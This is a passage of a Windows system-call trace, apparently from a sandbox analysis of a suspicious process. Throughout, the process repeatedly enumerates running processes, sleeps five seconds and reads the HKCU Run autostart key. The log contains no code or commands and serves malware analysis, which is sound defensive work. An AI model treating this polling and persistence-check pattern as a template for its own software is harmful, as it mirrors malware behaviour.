ResultLength=0x0) returned 0xc0000004 [0305.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.549] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.551] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.562] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.563] NtClose (Handle=0x378) returned 0x0 [0305.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.582] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.585] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.585] NtClose (Handle=0x378) returned 0x0 [0305.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.603] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.658] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.700] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.700] NtClose (Handle=0x378) returned 0x0 [0305.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0306.162] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0306.163] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0306.164] NtClose (Handle=0x378) returned 0x0 [0306.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0306.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0306.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0306.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0306.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0306.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0306.798] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0308.539] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0308.542] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0308.542] NtClose (Handle=0x378) returned 0x0 [0308.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0308.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0308.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0308.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0308.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0308.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0308.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0308.626] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0308.627] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0308.627] NtClose (Handle=0x378) returned 0x0 [0308.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0308.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0308.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0308.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0308.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0308.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0308.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0308.819] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0308.820] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0308.820] NtClose (Handle=0x378) returned 0x0 [0308.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0308.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0308.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0308.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0308.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0308.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0308.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0308.831] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0308.832] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0308.832] NtClose (Handle=0x378) returned 0x0 [0308.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0308.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0308.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0308.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0308.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0308.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0308.840] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0310.470] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0310.483] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0310.483] NtClose (Handle=0x378) returned 0x0 [0310.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0310.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0310.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0310.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0310.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0310.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0310.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0310.577] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0310.578] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0310.579] NtClose (Handle=0x378) returned 0x0 [0310.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0310.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0310.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0310.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0310.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0310.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0310.730] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.201] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.202] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.202] NtClose (Handle=0x378) returned 0x0 [0311.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.217] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.237] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.239] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.239] NtClose (Handle=0x378) returned 0x0 [0311.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.250] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.253] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.255] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.255] NtClose (Handle=0x378) returned 0x0 [0311.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, 